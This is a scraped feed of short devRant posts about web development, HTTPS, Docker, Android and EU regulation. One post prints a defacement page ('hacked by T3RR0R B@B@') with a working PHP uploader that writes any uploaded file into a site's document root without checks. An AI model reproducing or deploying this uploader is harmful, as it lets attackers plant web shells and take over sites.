Hey ranters, I made an RSS feed reader for devRant feeds. Open up your favorite RSS reader app on your device and add http://devrant-rss.herokuapp.com/ for devRant feeds to be shown up. The project is open sourced at https://github.com/varundey/.... Any suggestions welcome :)3
-
Stupid as hell fact :
Some 2nd graders (9yrs old) in Korea use VI to do coding in hagwons.
(See here : https://translate.google.com/transl... - translate from Korean)3 -
I just saw Kickstarter's blog post about moving over to the Blockchain. They're doing it because, uh, protocols, or something. No joke, here's a direct quote from their post:
"You may have heard of HTTP (Hypertext Transfer Protocol) which helps you browse the web, or SMTP (Simple Mail Transfer Protocol) which helps you send email. Protocols like these make up the unseen infrastructure of the internet. Imagine that, but for crowdfunding creative projects."
What the fuck does that even mean? The rest of the blog post is more of the same. They packed it full of every crypto buzzword they could find while also not actually providing any useful information.
Full article here, if anyone wants to read a headache-inducing pile of nonsense: https://kickstarter.com/articles/...9 -
!rant
Anyone who is interested in Laravel and CMSs solution might wanna check these out. I have just found these and looking into them right now.
http://www.atlantis-cms.com/
https://www.coastercms.org/7 -
http://".$_SERVER['HTTP_HOST']."/server, check the code below
<html lang='en-US'><head><title>T3RR0R B@B@</title>
<a href="https://www.facebook.com/mr.T3RR0R" target="_blank"><h2>Click Here !</h2></a><br>
<style>
body{cursor:url("http:////"),auto;}html{display:table;height:100%;width:100%;}body{display:table-row;}body{display:table-cell;vertical-align:middle;text-align:center;}a:link{text-decoration:none;}
body {
background-color: #000000;
background-image: url(https://imgwm.com/images/...);
<!--http://twitrcover.com/ar/uploads/...-->
margin-left: 0px;
margin-top: 0px;
margin-right: 0px;
margin-bottom: 0px;
background-position:right top;
background-repeat:no-repeat;
background-size:110%
}
.style1 {
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
}
</style><br><br><br>
<br>
<center><?php
echo "<form method='post' enctype='multipart/form-data'>
<input type='file' name='idx_file'>
<input type='submit' name='upload' value='upload'>
</form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['idx_file']['name'];
$dest = $root.'/'.$files;
if(isset($_POST['upload'])) {
if(is_writable($root)) {
if(@copy($_FILES['idx_file']['tmp_name'], $dest)) {
$web = "http://".$_SERVER['HTTP_HOST']."/";
echo "Ciee Sukses Uploadnya :* -> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
} else {
echo "gagal upload root >:(";
}
} else {
if(@copy($_FILES['idx_file']['tmp_name'], $files)) {
echo "Ciee Sukses Uploadnya :* <b>$files</b> di folder ini";
} else {
echo "gagal upload >:(";
}
}
}
?>
<!DOCTYPE html>
<html>
<title>K.I.T.A</title>
<audio autoplay loop>
<source src="http://micro.byethost24.com/KITA.mp..."></source>
</audio>
<head>
<link href='https://fonts.googleapis.com/css/...' rel='stylesheet' type='text/css'>
</head>
<body bgcolor="#2b2b2b" link="gray" text="gray">
<center>
<script type="text/javascript">
TypingText = function(element, interval, cursor, finishedCallback) {
if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
this.running = true;
return;
}
this.element = element;
this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
this.interval = (typeof interval == "undefined" ? 100 : interval);
this.origText = this.element.innerHTML;
this.unparsedOrigText = this.origText;
this.cursor = (cursor ? cursor : "");
this.currentText = "";
this.currentChar = 0;
this.element.typingText = this;
if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
TypingText.all.push(this);
this.running = false;
this.inTag = false;
this.tagBuffer = "";
this.inHTMLEntity = false;
this.HTMLEntityBuffer = "";
}
TypingText.all = new Array();
TypingText.currentIndex = 0;
TypingText.runAll = function() {
for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
}
TypingText.prototype.run = function() {
if(this.running) return;
if(typeof this.origText == "undefined") {
setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
return;
}
if(this.currentText == "") this.element.innerHTML = "";
if(this.currentChar < this.origText.length) {
if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
this.tagBuffer = "<";
this.inTag = true;
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
this.tagBuffer += ">";
this.inTag = false;
this.currentText += this.tagBuffer;
this.currentChar++;
this.run();
return;
} else if(this.inTag) {
this.tagBuffer += this.origText.charAt(this.currentChar);
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
this.HTMLEntityBuffer = "&";
this.inHTMLEntity = true;
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
this.HTMLEntityBuffer += ";";
this.inHTMLEntity = false;
this.currentText += this.HTMLEntityBuffer;
this.currentChar++;
this.currentChar++;
setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
} else {
this.currentText = "";
this.currentChar = 0;
this.running = false;
this.finishedCallback();
}
}
</script>
<br><br><br>
<div id="satu">
<embed src="https://youtube.com/v/tec_KllmOH4/...
<br>
<b style="font-size: 40px;">hacked by T3RR0R B@B@</b>
<br>
- use your brain to repair this system<br>
Scary Crazy Forbidden<br>
@2018<br><br>
Contact : fb.com/mr.T3RR0R
<br></div>11 -
So i found this the other day and thought i would share it with you.
It's a collection of short little songs inspired by HTTP status codes.
Neat idea but is a little rough around the edges.
https://thingsinjars.bandcamp.com/a...1 -
I hoped I would write about other things than EU internet regulation... But I hoped wrong.
The new online antiterror regulation is flawed, too.
What will the new regulation change?
The EU plans stricter anti terror laws for online platforms. In a nutshell, reported terroristic content has to be removed in <1 hour> after reporting. While automated filters are not required (the EVP party and the EU commission wanted those, but couldn't get a majority in the perliament), but it is unclear how to fulfill the regulation without.
What is the current progress of the regulation?
The EU parliament approved the draft, the trialogue will begin after election. The parliament has to approve the final trialogue result again and might reject it then. The characteristics of the regulation might change, too.
Who (platforms) will be affected?
All platforms, "offering servicd in the EU, independent of their business address" (free translation from German).
Will there be exceptions (e.g. for smaller or non commercial platforms)?
No.
At the very first report, the platform will have 12h time.
What are the consequences of not following?
Regularly breaking the law _constantly_, up to 4%/of the total yearly revenue.
Sources?
- The "fact sheet" of last year (upload filters were still a requirement): https://ec.europa.eu/commission/...
- The law proposal itself (also outdated): https://eur-lex.europa.eu/legal-con...
- Proposed changes by the EU parliament (I'm not sure which ones were approved): http://europarl.europa.eu/doceo/...
- German news article: https://golem.de/news/...2 -
Very eventful day, please see enclosed several smaller rants.
===================
My college's systems are shit and not only do they use HTTP for everything, even the stores and financial aid purchase system, they have homebrew JS shit for PGP site encryption (nifty...), but they exchange the PRIVATE KEYS instead of the public keys. Over HTTP. Not even HTTPS. Also if you log in more than 10 times in 24 hours it's supposed to lock you out of your account until you call... except it locks EVERYONE out. Found this out when on campus, trying to get my textbooks, when suddenly everyone had login lockouts because i'm a "paranoid bastard" and "afraid of idiot college students" for not telling a PUBLIC PC to remember the one password (enforced by password auto-sync across all their shit, not ideal, no) guarding my SUPER-SENSITIVE FINANCIAL AND ACADEMIC DATA... among the other hundreds of issues this college has. I now see why this college is the only one I can afford...
===================
Can't pass-through raw DVD drive access to VMs as VM managers crash when I try (yes, even QEMU...) so i've gotta install Windows on a shitty 80GB laptop HDD for literally one quick project. On the bright side, if my theory proves correct, you'll no longer need modchips for PS2s.
===================
Found a couple odd lines in my xscreensaver config:
GetViewPortIsFullOfLies:False
nice: 10
pointerHysteresis: 10
the first 2 I can't seem to figure out what do, and the last taught me a new word. Fun!
===================
that's it, it's over, why are you still here11 -
What do you think about HTTP/3, QUIC, WebTransport?
https://web.dev/webtransport/ (It is still a *draft*, but google is already implementing it and stuff)
Idk it feels weird for me that HTTP will be served over UDP/QUIC10 -
With the billions of dollars Google has, they can't even build a proper file manager for their Android operating system.
The pre-installed file manager on Android OS, codenamed "DocumentsUI", is functionally crippled and lacks the most basic functionality.
First of all, there is no range selection or A-to-B selection of items. If many items need to be selected, each item has to be tapped individually. Meanwhile, ES File Manager had A-to-B selection since at least 2012, back when Android OS was an operating system of freedom, before Android OS got cucked.
As any low-tier mobile app, the file manager by Google also lacks a draggable scroll bar, so long lists have to be scrolled through manually. Even the file manager of Windows Mobile 6.5 Professional has a draggable scroll bar! And Windows Mobile 6.5 Professional was released in 2009! Samsung "My Files" had a draggable scroll bar in 2013 but it was later unexplainably removed.
Its search feature can only search the entire storage, not an individual folder, and lacks filters such as date and file type.
Obviously, as in any terrible Android file manager, after items are selected for copying and moving, tapping "Copy to..." or "Move to..." navigates back to the initial directory rather than staying in the current directory. The user is forced to navigate all the way to the folder with the selected files if the intention was moving files to a sub folder. Any Android file manager that does this automatically qualifies as a low-tier file manager.
The file manager by Google even lacks a "details" feature which shows information such as the exact file size and name and the total size and file count of a folder. Some file managers such as the one by MediaTek are unable to show the details for multiple selected items, which is somewhat forgivable, but the Google file manager does not have a "details" feature to begin with.
Files are always sorted alphabetically after each start. The Google file manager does not memorize if the user selects sorting "by size" or "by last modified". As one might expect, it indeed lacks reverse sorting.
Of course, there is no "open with" feature where the application can be selected manually, and there is no ability to create new blank files, and it lacks tabbed browsing, and does not show the number of files inside folders in list view. ES File Manager (before it became adware in ~2016) has all of these features.
Last but not least, there has been a bug where cancelling a file move operation deletes the source folder without it having been transferred. Presumably it has been patched by now, however, a bug where tapping "cancel" leads to data loss is inexcuseable. It shows the app has not even been properly tested, let alone properly created.
http://archive.today/2020.10.27-160...
Google could have hired a college student who could have built something better than the scrapyard-worthy "file manager" they have built.
But granted, at least Google's ever-so-terrible file manager does not limit file names to fifty (50) characters like Samsung's TouchWiz file manager, also known as "My Files", did until at least 2016. There is no way to know what went through the head of the programmer who implemented this pointless limitation. Google's file manager also correctly handles file name conflicts by renaming the new files.
Microsoft built a better file manager for their operating system decades earlier than what Google threw together. Microsoft spent more of their money building a proper file manager.6 -
A conversation between an offshore developer and his manager at a fortune 500:
I'm a software developer and the company I work for is a vendor for $manager's and $offshore_dev's company. They provide endless hours of entertainment/terror. Recently, we've been trying to convince them that they need to stop sending sensitive information plaintext over HTTP and set up TLS/HTTPS which has led to tons of fun conversations such as this one they had during a conference call:
* $manager: "Did $offshore_dev implement TLS1.2?"
* $offshore_dev: "Yes, we enabled a parameter in the code to enable TLS1.2 in the code but according to $me's email, this requires HTTPS in order to work."
* $manager: "No this works, we're using TLS in $other_application right now."
* $offshore_dev: "Well, $manager, it's implemented but it currently doesn't encrypt anything as such."
* $manager: "Okay, HTTPS is in the roadmap in the next quarter, we can move forward without this for now."4 -
Did you know that North Korea has its own government approved Linux distro? Well, now you do.
It is so funny that the damn North Korea has fully transferred to Linux, but not any country in Europe, nor the US.
So have anyone here tried it? If so, how is it?
Download link:
http://openingupnorthkorea.com/down...
Article about distro:
https://motherboard.vice.com/en_us/...2 -
Step 1: Make own cat feeder: https://youtube.com/watch/...
Step 2: Integrate it with http://open-notify.org/Open-Notify-... to dispense food every time International Space Station is above my location.
Step 3: Wait some time, and check if I will be able to tell ISS location by looking at my cat2 -
So theoretically all it takes are 12 libes of Python for arbitrary Code Execution on a Windows system.
'Theoretically', because it loads Kernel Drivers, which any half decent antivirus can detect and block.
http://feedproxy.google.com/~r/...
https://github.com/zerosum0x0/...1 -
Firefox developer fucked up this morning my development after the update -_-
The fucking "Enhancing Tracking Protection" was on a local Wi-Fi IP address(192.168...) which automatically redirected to the https of that IP, but I did setup kestrel to listen on HTTP, which resulted in a nice "Cannot enstablich a secure connection(and suck it up because ¯\_(ツ)_/¯)"
Fortunately it's easy to get rid off this cunt, just go on the shield nearby the address and disable that motherfucker.
ps: sorry for the lil rage, my morning train trip development brain cells should not be bothered by this automatic technical troubles
Further question to the Firefox developers:
WHAT THE FUCK are you thinking when you force developers to automatic HTTPS redirection when you should know more than anyone that development is 360deg(and not 90 like your mom)1 -
iphone x fails
I use smartphone with OLED display since 2010 and never got this problem, but for apple is normal
http://pocketnow.com/2017/11/...
here we're not talking about twins, but just brothers
https://macitynet.it/face-id-fail/...
ROTFL seriously?
https://macrumors.com/2017/10/...
but what else you want from a really good deal (cook said) phone for only more than 1000$???3 -
Hey Guys
Linux VPS + Apache2 + https
I'm a noob in Linux, got my VPS live, but I'm serving http... Even if my page doesn't save even cookies It will marked as unsecure.
Is it possible to config Apache2 to serve https?
Thank you
PS.: Googled and got nothing special, only info about Apache28 -
I deployed docker on a VPS a few weeks ago as a sort of learning experience since I haven't really worked with containers much before. Today I learned that docker doesn't like firewalls.
Or, to be more specific, it adds rules to iptables that are applied prior to ufw rules, allowing external connections that I really didn't want to allow. If I don't explicitly specify that a port is to be published only to localhost, then it punches a hole through my firewall without telling me.
Which means that all of my containers running behind an nginx reverse proxy that auto-redirects to HTTPS... were also accessible directly via HTTP.
I'm... trying to think of a reason why this kind of default behavior was a good idea, but I'm drawing a blank.
Fucking Docker.4 -
Optionsbleed - HTTP OPTIONS method can leak Apache's server memory
https://blog.fuzzing-project.org/60... -
When I commented that that there may be non-euclidean equivalents to certain stat functions (average, mean, mode, etc), apparently there were others out there with the same general idea.
Some guys over at stanford are exploring hyperbolic spaces for machine learning, which is exactly the sort of applications I had in mind.
Very fascinating work, go check it out if it's something that interests you..
https://dawn.cs.stanford.edu/2019/...
And the related paper that it is based on:
http://proceedings.mlr.press/v80/...2 -
So there I am sitting in front of my laptop, and trying to npm i and I am getting all sorts of sha mismatch errors.
After lot of debug I conclude it is coming from the proxy as it refuses to download and supplies the error page.
It says it's because I'm using the old proxy so they give me the new URL which I set up and it works.
All good until my password expires. I use our bash script to change it. NPM is buggered again throwing the same errors.
Go to IT, tell them the saga begins.
After a countless hours of looking at the log files we notice that the npm registry is set to http instead of the standard https (thanks bash script). so our firewall blocks the download.
Sorted, finally.
Almost. NPM now works fine, but when I go and I play around with node and axios, I get my requests time out. My instinct says its the bloody proxy again.
So I hit up my trusted WIN Support guy and he confirms that the url is not blocked. So he starts monitoring whats going on and turns out, every time I run the node app, node casually ignores the system-wide proxy settings and tries to send the request as the PC rather then my username.
Since the pc's don't have rights on the proxy it is being refused...
Thank fuck for the corporate proxies, without them, I could just develop things not ever learning these quirks of node...3 -
My another attempt to write something in rust and I wanted to try tauri as it’s promising competition to electron.
Why use tauri not electron?
Cause in tauri you can write rust plugins that you can interact with directly from javascript without stupid http servers, mangling code and stuff.
From javascript point you only call one method and pass object with arguments into it.
So it took me entire weekend to create draft plugin to interact with sqlite database.
Documentation of tauri is inconsistent. I understand that cause it’s young project and plugins architecture changed frequently.
Moreover my knowledge of rust is near to zero. But overall it was worth it. I like what I achieved.
I can pass sql query and execute it inside mutex guarded singleton. Like I said before I like it cause I can call my plugin directly from javascript.
I know I wasn’t fancy with my implementation. I just created file database connection from json configuration and managed to receive string sql statements. I just print results with rust to console for now.
I will add sending back results later this week.
For me tauri is already better then electron cause code is clear and there is no workaround ( except singleton with connection - cause of limitations of my rust knowledge ).
Live long tauri and fuck you electron.
https://tauri.studio/en/
if you’re interested.2 -
> be me
> recruiter: *sends a LinkedIn request with a message, I saw your profile, you're quite proficient in javascript and jQuery, do you want to work with us with cutting edge meteorjs stack*
> me : *the fuck ?! I don't even know that library exists, replies anyway for a call*
> me:...okay I'll call before I come in
> me: *quick look on their website which is built on meteorjs, fucking beautiful*
> me: *opens console out of curosity*
> me: holy shit, what the fuck? they're loading jQuery 1.1.2 over HTTP and website is on HTTPS, top of that they are loading jQuery libraries before jQuery.
> me : *reports to the recruiter*
> recruiter: thanks, we'll look into it
> ???
> profit
and I don't plan to work a place like that3 -
Some facepalm things I've discovered recently:
- Node's require("http") doesn't work for https - you have to require("https") specifically.
- Mongofiles (command line utility for Mongo, imports files as GridFS) cannot input more than one file at a time. Regex doesn't work. [Ended up making a puny Powershell script to do it].
- Airtable doesn't let you download your attachments, even if you export a csv - it's just a url to the image on their cloud.
It's been an exhausting day.1 -
Webdev, I should send a form to a site that gets the results and redirects back to the webpage that stands in an invisible form data (very weird!).
Okay, I did...
When I was finished the site didn't redirect to the URL I gave in the form, instead it showed parts(!) of the webpage's HTML.
Okay, I was a little bit surprised and mailed the dev of this weird thing. He answered with this:
"In this Internet thingy, you know, URLs start with 'http://', it's the newest shit!"
Holy shit! Is he serious!? Who the heck programmes such a site that needs a 'http://' in the beginning? (Does this guy know about https?)
And why, why!?, did it show contents of the target URL's site if you give it one without http!?
I, I will go now and get a mild tea, yeah...3 -
PlantUML is awesome! It's versatile, code based (e.g. version control is simple) and the results are great and as portable as you need.
http://plantuml.com/
https://github.com/plantuml/...3 -
Talking about the Open Graph protocol (http://ogp.me/)
Why the fuck does the Facebook Object Debugger tell me that my image in the og:image meta tag could not be loaded when I put a HTTPS link in there, but when there is a HTTP link with a permanent redirect to the HTTPS link it can load the fucking image.2 -
Built a pFSense box for home with said proxy. Even though my internet connection is slow it seems fast now thanks to squids MITM https proxy and http proxy. Plus a little QoS helps. And it has so many more features than a regular router.... WTF didn't I do this sooner?4
-
http://www.rainymood.com/
https://youtube.com/watch/...
http://endlessvideo.com/watch/...
>Open all 3 in seperate tabs
>My ultimate coding zone3 -
I've read the docs but my tired brain overrided an important detail.
https://haproxy.com/documentation/...
"By default, HAProxy Enterprise will serve these pages only if it initiated the error itself. For example, it will return the page for a 503 Service Unavailable error if it can't reach any backend servers."
I had _the_ return part for interception of the error page from the backend added, not the default override for the error page of HAPRoxy itself.
Took me 4 hours, crying, madness and screaming to realize it.
This week is really wringing the last bits of the gooey slime what should be my brain out...
-.-
Another fun part is that I mistakenly thought the delimiter for multiple strings to an ACL comparison is a comma... It's a whitespace.
acl is_evil hdr(host) -i one,two is wrong.
acl is_evil hdr(host) -i one two is right.
I used to write HAPRoxy configurations blindly, today it was more like writing two lines of codes 100000000 times and still doing it wrong TM.
I need new brain.
Anyone got an offer?3 -
google pixel 2 vs iphone x fails
recap pixel 2:
- http://pocketnow.com/2017/11/...
- https://neowin.net/news/...
- https://engadget.com/2017/10/...
- https://neowin.net/news/...
recap iphone x:
- https://engadget.com/2017/11/...
- https://engadget.com/2017/11/...
- https://neowin.net/news/...
- https://neowin.net/news/...
- https://neowin.net/news/...
- https://reddit.com/r/iphone/...
- https://macrumors.com/2017/10/...
- http://pocketnow.com/2017/11/...
- http://pocketnow.com/2017/11/... -
It looks like Olognion is shutting down due to the intersection of !money and !ads. I kind of feel like we could keep this site alive with a combination of a static site generation and/or some crowdfunding.
Thoughts?
https://twitter.com/theolognion/...
https://web.archive.org/web/...9 -
Hey Guys
Today I'm bringing a tool for you guys, mount servers with old phones Or have servers in your phone for testing.
Tool: Servers Ultimate Pro
Web:: https://icecoldapps.com/app/...
Note1.: Doesn't handle well above android 6+, So test one of the free servers you're intending to use before buying.
Note2.: This App costs around 10€/$ but you can get single App servers for free (I think even html + php + mysql package for free).
Not promotional, I'm just a user that loves this App.
I already talked about this a few times (usually I just call the cell phone I'm using my web server), but as a noob I don't even knot the possibilities.
This App comes with more then 70 protocols (60+ servers and a mix of servers).
From ssh, ftp, html (nginx, lightppd, Apache, simple) with php and mysql, Webdav...
<quote>
Run over 60 servers with over 70 protocols!
Now you can run a CVS, DC Hub, DHCP, UPnP, DNS, Dynamic DNS, eDonkey, Email (POP3 / SMTP), FTP Proxy, FTP, FTPS, Flash Policy, Git, Gopher, HTTP Snoop, ICAP, IRC Bot, IRC, ISCSI, Icecast, LPD, Load Balancer, MQTT, Memcached, MongoDB, MySQL, NFS, NTP, NZB Client, Napster, PHP and Lighttpd, PXE, Port Forwarder, Proxy, RTMP, Remote Control, Rsync, SMB/CIFS, SMPP, SMS, Socks, SFTP, SSH, Server Monitor, Stomp, Styx, Syslog, TFTP, Telnet, Test, Time, Torrent Client, Torrent Tracker, Trigger, UPnP Port Mapper, VNC, Wake On Lan, Web, WebDAV, WebSocket, X11 and/or XMPP server!
</quote>8 -
!rant
type(rant) = shameless_self_promotion
I made an open source python personal assistant named W.I.L.L!
I made a reddit post about it here: https://reddit.com/r/Python/...
and you can use it for free at http://willbeddow.com
I've been working on it for a few years and it has a few hundred users.
Code: https://github.com/ironman5366/...12 -
Dancing and singing in my house with windows open!
Volume : 100%
With my Shure SM58: http://amzn.to/2jBvChZ
Neighbors yelling out the window saying "Whoever singing, stop the hell off!"
LOL
ElementD - Giving In
https://youtube.com/watch/... -
Seeking help from anyone able to read Laptop motherboard semantics sheet
In short: Looking for a blown fuse on Laptop (Dell Inspiron 7547) near LCD cable connector, as not getting backlight after a new screen installation. Screen is functional and is detected properly and the device is passing all the diagnostics tests.
Issue tracked here
https://reddit.com/r/Dell/...
And here,
http://tomsguide.com/answers/...
Thanks ++8 -
In university, I got really into cryptography. I wrote software that was testing the entropy of lots and lots of HTTPS encrypted packets, for sites that also supported HTTP. Meant that I had a pretty good idea what the plaintext was, and the quality of the encryption algorithms used. In the end, I got into lots of trouble with my university because apparently what I was doing could be deemed 'dangerous'! Never felt more like a hacker in my life.
-
!rant
So the game I've been working since January is showing off a demo at ECGC also known as the East Coast Game Conference in North Carolina :D
http://ecgconf.com/
If anyone is free on the 17th to 19th of April and enjoys games come try it out!
(it's $35 for a pass at least for the standard pass at least)
The game is called Redemption's Guild, which is a multiplayer online VR RPG and our company is called Unlit Games.
Our website: https://unlitgames.com/redemptionsg...
Sadly I won't be there but some people from the company will :D
I've been working hard to make this game, I hope the people that play it enjoy it as much as I loved (and still love) working on it.
Also our animator is giving a talk, so if you enjoy animation and possibly how it was done (i'm not 100% what the talk is about lol) stay for that aswell!2 -
Do you guys return 200 when a search function in your API returns a not found and you attach a response in the object saying "success: false", or do you return 404? I'm confused. Thanks.
https://softwareengineering.stackexchange.com/...3 -
GET Requests with a BODY as a payload are legit and stop living in denial!
TALKING TO YOU ANGULAR!
I'm fucking sick of seeing ignorant people(on SO or GitHub) coming up with the generic advice, on HTTP GET issues with having a BODY as a payload, to don't do that or you shouldn't, yadayadayada.
It's not a fucking issue at all in general, because as RFC-7231(https://tools.ietf.org/html/...) sais:
"A payload within a GET request message has no defined semantics; sending a payload body on a GET request might cause some existing implementations to reject the request."
So, if your fucking server can't handle them(aka living in the past), [rest] in peace and suck it up!
(ps, I happen to use modern servers)
But why should you limit a fucking front-end framework(ex. Angular) in the first plate to being able to send such requests?!
It's a moronic limitation and the person or team responsible for it are at least clueless and as far the issue has reappeared through time, for how old is Angular, they didn't move an inch.14 -
I made a wordpress website to one of my friends long time back as he wants to teach online and sell his videos. (he is studying MBBS)
Yesterday suddenly he calls me and says our site has been compromised and its not longer secure.
Me: After seeing screenshot, no actually site doesn't have ssl and in recent chrome updates http site is being flagged.
He: Okay, I saw video on youtube how to buy ssl.
Me: its not just installing the certs, all the links and images has to be on https so it will take sometime for me.
He: Today, Website is no longer opening please help after putting ssl as per the video...
Me: What the hell? Who asked you to do that? Are you nuts?
He:................. Sorry, 😐2 -
FFS! having nodejs server on heroku, added certificate successfully for https, yet when going to www.example.com it uses http on prod and maintanence page while example.com goes to https.
All my attempts to catch http connection failed.
This is the definition of me wanting to bang my keyboard and problem autosolves itself while I am doing it!
Where is the my one click and everything is ready. I want to code back end and front end not spend 2 days trying to figure out https bullshit for unknown reason. -
Hello fellow Devs,
I have developed a small Android library for handling HTTP POST and GET requests. Anyone who is looking for an easy way to perform HTTP calls, can use this library. It supports post requests with JSON and Multipart Form data, file uploading and Get request with URL parameters.
Hope it will help you guys.
https://github.com/shubhadeepb14/...8 -
Let’s look at what the web is doing?
Warning: Although the pages I posted are safe, I did not dig much past them so not sure what you may find. Be vigilant, update.
Effective use of whitespace or pure insanity?
http://www.arngren.net/
https://m.lingscars.com/
(LOL, make sure to right click view-source of Lings Cars and scroll down )
http://www.dokimos.org/ajff/
Or their homepage
http://www.dokimos.org/1 -
Screw you Chrome and your security fixes. You wasted 3 hours of my life.
Hate cross-origin and the fact that requests to http://cdn.example.com from http://example.com are considered cross-origin.
https://developers.google.com/web/...1 -
{
"$schema": "http://json-schema.org/draft-04/...#",
"type": "object",
"id": "https://[URL_NAME]/forms/{id}/...#",
"properties": {
"title" : { "type": "string" },
"date" : { "type": "string" },
"content" : { "type": "string" },
"date_start": { "type": "string" },
"date_end" : { "type": "string" },
"status" : {
"type" : "string",
"enum" : ["1", "2", "3", "4", "5"]
}
},
required [
"title",
"date",
"content",
"date_start",
"date_end",
"status"
]
}
See if you can notice the error is this schema. Don't copy and paste it. I change some format to obsfucate the real data naming, but this schema error is still up there
Just wasted my 30 minutes staring at this10 -
I started working for a forex company as a web developer, designer and also a online marketer, so when i was doing the designing part the boss of mine became very happy as he can see the results of my work.
But from few days I was doing the backend part and fixing some security flaws. Today i recieved a message saying that if you are not capable or free to do the work i will hire someone else for the work.
Working under people who doesn't know difference between http and https sucks.5 -
I ask everyone to hack my web-server located at the following address. See not HTTPS. It is open to all
http : // 127.0.0.13 -
Follow up on previous post https://devrant.com/rants/1986014/...
Tell my dad about this and this is the convo we have when he goes "why didn't you think of that... in fact I had this app idea 2 years ago"
Clear pic: http://imgur.com/a/9ESrRga2 -
// new Rant("help needed!")
I really need some help guys! Would be nice if you could checkout
http://stackoverflow.com/questions/...
and help me out if possible :) Got some problems with ffmpeg on OS X not streaming https urls.
And if these kind of rants aren't supposed to be posted/created please tell me so. I am still not familiar with the overall flare of this community ;)8 -
I'm just testing out some code for Spring Boot with Spring web. Whilst inspecting Spring's HttpStatus enum I suddenly realized there are a lot more HTTP status codes than I had estimated. I knew there were many, but woah that's a lot.
Check it:
https://en.wikipedia.org/wiki/...
On a side note, it really helps to debug work stuff at home. More concentration, more time and such.
Fun fun.4 -
So I have purchased the domain studioentropy.com. It's taken me all afternoon but I've set up and configured aws s3 buckets and route 53 zone an entries and my shite asse site is now online, hooray... My question is with regards to https. Given that ny site is really only going to be a single page site with relatively static content, no eccomerce of any kind, no passing of sensative information is required, is it really worth going through the pain of configuring cloudfront so the site uses https instead of http?13
-
Happy system administrator appreciation day! No, really. This is a thing.
http://sysadminday.com/
https://nationaldaycalendar.com/201... -
Forbes study https://lnkd.in/f4GDPnf shows that there has been a drastic reduction in pollution levels in China during the lockdown period due to Coronavirus outbreak.
I think it can be a pretty good idea to lockdown the world periodically to heal the planet. Here's a petition for the same. If you support the cause, please sign and share at http://chng.it/pxVMSKrmv610 -
I am the responsible for the atlassian Suite at work, as I maintain the systems, set them up, and stuff.
One day, our crowd (the authentication and authorization application) just went crazy. At like lunch time it could not connect to the AD anymore. No reasons. Throwing XSRF errors (cross site scripting), because http would connect to https. "won't do it, fuck you" it told me. Out of the blue. Noone changed anything. And yea, seriously. Noone did.
It just refused to connect (as connecting to AD is connecting yourself with you own api. And refusing yourself talking to yourself). It runs behind a proxy. Therefore http/https. Well, this worked for years. But out of sudden not anymore.
Yea. Fuck you.
It was reported some hours later, at like 3pm, as people could not login to the applications using crowd as authentication and authorization server.
Tried to debug the system, where nothing was did, to make it work. At best time to fail.
First workaround: if you are logged into one of the other applications of atlassian, just refresh the site, so your SSO token gets a refresh and you are signed on again.
Then I searched more and more. And more.
But nothing worked, nothing helped.
So I addressed an emergency maintenance, take down the whole Suite, restart crowd, to apply some changes to it's settings, not knowing what happening then, because all connections of SSO will then be released. Sent out the mail like 30 minutes beforehands.
While waiting for the window, I just typed my credentials... And redid, and redid, so to type and being bored.
Three minutes before the window...
It just worked again.
Well. Wtf. Serioudl
Just came back.
No Intrusion, no changes at all. Just came back, as nothing has happened.
Kind of best part of this story... A headhunter messaged me on my way home to offer me a job as an Atlassian Suite SysAdmin for a company, at kinda the double of my salary.
At first I was thinking to go there, and when someone then asked me sth about Atlassian just start to laugh and then leave still laughing...
But then I very nicely respond that I dont want to cry at work. And wished him best luck.
I am doing some bad upgrades now on our Suite. Very painful.
And I looked into the start scripts. Some Look like the untalented intern tells another one to write scripts. Seriously wtf.
Today I followed the guide to Update a confluence and change database to Postgres. Didnt work, Postgres error.
Try it again, jquery won't load. Next try, tomcat not starting anymore. Did same thing. Every fucking time.
Yea. Maintenance window to get a nice new export soon. Will only take an hour.
To switch database in confluence, you need to set it up very fresh. And then Import your export.
Export takes an hour at our system.
Importing maybe the same time. Hope it will work (hint: Nope).
Oh, can be nice also. Just tell the Bitbucket to migrate databases, there is a fucking setting for it. Enter new database, ready, go, finished.
At least they don't raise costs very much every kinda year.
Oh sorry, yes, they do.4 -
36 Tb Of Cloud storage?
Ref: http://1mtb.com/how-to-get-36-tb-fr...
Ref: https://en.wikipedia.org/wiki/...
https://www.360.cn/
Hey guys
was browsing on Cloud storage and found this Pearl...
Virtually unlimited storage.
I know It's a Chinese service (so privacy = null) but to place huge files...
Who knows or uses this service that can provide us with some info?
Thanks20 -
Fuckin damn it Google! I setup a transparent proxy and for some fucking reason Google home doesn't like that at all. I think I have a fix but it's a real fucking pain in the ass. I call your support people who I specifically tell that I'm running a fucking proxy and they tell me that I need to talk to their Google WiFi team. It has nothing Todo with my fucking wifi bitch. Its your price of shit price of crap hardware that doesn't like fucking proxies.
I'll update everyone what the fix is when I find it.
Btw, this is a HTTPS transparent proxy and HTTP transparent proxy running on my pFSense firewall box.5 -
So the other day I was saddened when I found out the http://nooooooooooooooo.com/ website was gone. This website I feel is a bit of internet history.
So I screamed nooooooooooo!
But today I found a new website: http://www.nooo.me/
It is a joyous day!
https://youtube.com/watch/...3 -
https://i.imgflip.com/2i02zy.jpg
git branch -r
origin/204/match-dsteem-on-sign-transaction
origin/305-support-hive-legacy-api
origin/307-call-async
origin/72-http-socket-support
origin/HEAD -> origin/dev
origin/appbase-http
origin/chore/fix-ws
origin/default-server
but
git push --follow-tags https://github.com/lopudesigns/... --set-upstream origin dev
fatal: refs/remotes/origin/HEAD cannot be resolved to branch.
wut -
!rant
Good week! First off to Nordic.js in Stockholm (thu-fri), then Red hot chili peppers live on saturday!
Javascript and Red hot, they both rocks!
Source reference:
http://jsrocks.org
https://rockhall.com/inductees/... -
